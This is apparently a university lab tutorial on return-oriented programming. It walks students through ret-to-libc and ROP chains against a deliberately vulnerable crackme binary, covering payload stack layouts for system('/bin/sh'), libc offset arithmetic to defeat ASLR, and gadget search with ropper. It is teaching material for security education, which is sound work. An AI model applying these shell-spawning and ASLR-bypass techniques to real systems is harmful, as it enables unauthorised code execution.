================================== Lec07: Return-oriented Programming ================================== In this tutorial, we are going to learn about the basic concept of return-oriented programming (ROP). 1. Ret-to-libc ============== To make our tutorial easier, we assume there are code pointer leaks (i.e., system() and printf() in the libc library). ------------------------------------------------------------ void start() { printf("IOLI Crackme Level 0x00\n"); printf("Password:"); char buf[32]; memset(buf, 0, sizeof(buf)); read(0, buf, 256); if (!strcmp(buf, "250382")) printf("Password OK :)\n"); else printf("Invalid Password!\n"); } int main(int argc, char *argv[]) { setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stdin, NULL, _IONBF, 0); void *self = dlopen(NULL, RTLD_NOW); printf("stack : %p\n", &argc); printf("system(): %p\n", dlsym(self, "system")); printf("printf(): %p\n", dlsym(self, "printf")); start(); return 0; } ------------------------------------------------------------ $ checksec ./target [*] '/home/lab/tut-rop/target' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) Please note that NX is enabled, so you cannot place your shellcode neither in stack nor heap, but the stack protector is disabled, allowing us to launch a control hijacking attack. $ ./target stack : 0xffea0e00 system(): 0xf7e5e310 printf(): 0xf7e6b410 IOLI Crackme Level 0x00 Password: Your first task is to exploit a buffer overflow and print out "Password OK :)" (How could you find the pointer to "Password OK :)"?) Your payload should look like this: [buf ] [.....] [ra ] -> printf [dummy] [arg1 ] -> "Password OK :)" When printf() is invoked, "Password OK :)" will be considered as its first argument. As this exploit returns to a libc function, this technique is often called "ret-to-libc". 2. Understanding module ======================= Let's get a shell out of this vulnerability. To get a shell, we are going to use the system() function (try, 'man system' if you are not familiar with). Like the above payload, you can easily place the pointer to system() by replacing printf() with system(). [buf ] [.....] [ra ] -> system [dummy] [arg1 ] -> "/bin/sh" But what's the pointer to "/bin/sh"? In fact, typical process memory (and libc) contain lots of such strings (e.g., various shells). Think about how the system() function is implemented; it essentially fork()/execve() on "/bin/sh" with the provided arguments. gdb-pwndbg provides a pretty easy interface to search a string in the memory: $ gdb-pwndbg ./target ... > search "/bin" libc-2.19.so 0xf7f80d4c das /* '/bin/sh' */ libc-2.19.so 0xf7f82790 das /* '/bin:/usr/bin' */ libc-2.19.so 0xf7f82799 das /* '/bin' */ libc-2.19.so 0xf7f82ccd das /* '/bin/csh' */ ... There are bunch of strings you can pick up for feeding the system() function as an argument. Note that all pointers should be different across each execution thanks to ASLR on stack/heap and libraries. Our goal is to invoke system("/bin/sh"), like this: [buf ] [.....] [ra ] -> system (provided: 0xf7e5e310) [dummy] [arg1 ] -> "/bin/sh" (searched: 0xf7f80d4c) Unfortunately though, these numbers keep changing. How to infer the address of "/bin/sh" required for system()? As you've learned from the 'libbase' challenge in Lab06, ASLR does not randomize the offset inside a module; it just randomizes the base address of the entire module (why though?) 0xf7f80d4c (/bin/sh) - 0xf7e5e310 (system) = 0x122a3c So in your exploit, by using the address of system(), you can calculate the address of "/bin/sh" (0xf7f80d4c = 0xf7e5e310 + 0x122a3c). Try? By the way, where is this magic address (0xf7e5e310, the address of system()) coming from? In fact, you can easily compute by hand. Try "vmmap" in PEDA: > vmmap LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA 0x56555000 0x56556000 r-xp 1000 0 /home/lab06/tut-rop/target 0x56556000 0x56557000 r--p 1000 0 /home/lab06/tut-rop/target 0x56557000 0x56558000 rw-p 1000 1000 /home/lab06/tut-rop/target 0xf7e1d000 0xf7e1e000 rw-p 1000 0 0xf7e1e000 0xf7fc9000 r-xp 1ab000 0 /lib/i386-linux-gnu/libc-2.19.so 0xf7fc9000 0xf7fcb000 r--p 2000 1aa000 /lib/i386-linux-gnu/libc-2.19.so 0xf7fcb000 0xf7fcc000 rw-p 1000 1ac000 /lib/i386-linux-gnu/libc-2.19.so ... The base address (a mapped region) of libc is '0xf7e1e000'; "x" in the "r-xp" permission is telling you that's an eXecutable region (i.e., code). Then, where is system() in the library itself? As these functions are exported for external uses, you can parse the elf format like below: $ readelf -s /lib/i386-linux-gnu/libc-2.19.so | grep system 243: 0011b8a0 73 FUNC GLOBAL DEFAULT 12 svcerr_systemerr@@GLIBC_2.0 620: 00040310 56 FUNC GLOBAL DEFAULT 12 __libc_system@@GLIBC_PRIVATE 1443: 00040310 56 FUNC WEAK DEFAULT 12 system@@GLIBC_2.0 0x00040310 is the beginning of the system() function inside the libc library, so its base address plus 0x00040310 should be the address we observed previously. 0xf7e1e000 (base) + 0x00040310 (offset) = 0xf7e5e310 (system) Then, can you calculate the base of the library from the leaked system()'s address? and what's the offset of "/bin/sh" in the libc module? 3. Simple ROP ============= Generating a segfault after exploitation is a bit unfortunate, so let's make it gracefully terminate after the exploitation. Our plan is to 'chain' two library calls, like this: system("/bin/sh") exit(0) Let's think about what happen when system("/bin/sh") returns; that is, when you exited the shell (type 'exit' or C-c). [buf ] [.....] [ra ] -> system [dummy] [arg1 ] -> "/bin/sh" Did you notice that the 'dummy' value is the last ip of the program crashed? In other words, similar to stack overflows, you can keep controlling the next return addresses by chaining them. What if we inject the address to exit() on 'dummy'? [buf ] [..... ] [old-ra ] -> 1) system [ra ] -------------------> 2) exit [old-arg1 ] -> 1) "/bin/sh" [arg1 ] -> 0 When system() returns, exit() will be invoked; perhaps you can even control its argument like above (arg1 = 0). Try? You should be able to find the address of exit() like previous example. Unfortunately, this chaining scheme will stop after the second calls. In this week, you will be learning more generic, powerful techniques to keep maintaining your payloads, so called return-oriented programming (ROP). Think about: [buf ] [..... ] [old-ra ] -> 1) func1 [ra ] -------------------> 2) func2 [old-arg1 ] -> 1) arg1 [arg1 ] -> arg1 After func2(arg1), 'old-arg1' will be our next return address in this payload. Here comes a nit trick, a pop/ret gadget. [buf ] [..... ] [old-ra ] -> 1) func1 [ra ] ------------------> pop/ret gadget [old-arg1 ] -> 1) arg1 [ra ] -> func2 [dummy ] [arg1 ] -> arg1 In this case, after func1(arg1), it returns to 'pop/ret' instructions, which 1) pop 'old-arg1' and 2) return to func2 (again!). Although 'pop/ret' gadgets are everywhere (check any function!), there is a useful tool to search all interesting gadgets for you. $ ropper -f ./target .... 0x0804901e: pop ebx; ret; .... By using this 'gadget', we can keep chaining multiple functions together like this: [buf ] [..... ] [old-ra ] -> 1) func1 [ra ] ------------------> pop/ret gadget [old-arg1 ] -> 1) arg1 [ra ] -> func2 [ra ] ------------------> pop/pop/ret gadget [arg1 ] -> arg1 [arg2 ] -> arg2 [ra ] ... To invoke: func1(arg1) func2(arg1, arg2) Try to invoke: printf("Password OK :)") system("/bin/sh") exit(0) In fact, this is just basic idea. After executing 'pop ebx; ret;', you are now controlling the value on a register (ebx = arg1), which means you can do bunch of other things (e.g., invoking system calls). Not surprisingly, this kind of techniques turn out to be turning complete (see, our reference). You know what? All gadgets are ended with "ret" so called "return"-oriented programming. 4. Simple ROP ============= Your job today is to chain a ROP payload: open("/proc/flag", O_RDONLY) read(3, tmp, 1024) write(1, tmp, 1024) More specifically, prepare the payload: [buf ] [..... ] [ra ] -> 1) open [pop2 ] --------------------> pop/pop/ret [arg1 ] -> "/proc/flag" [arg2 ] -> 0 (O_RDONLY) [ra ] -> 2) read [pop3 ] ------------------> pop/pop/pop/ret [arg1 ] -> 3 (new fd) [arg2 ] -> tmp [arg3 ] -> 1024 [ra ] -> 3) write [dummy ] [arg1 ] -> 1 (stdout) [arg2 ] -> tmp [arg3 ] -> 1024 1) tmp? Any writable place in the program? (i.e., check vmmap) 2) "/proc/flag"? Any place you can inject such a string in the stack as part of your buffer input (i.e., use "stack") Please exploit ./target-seccomp with your payload and submit the flag!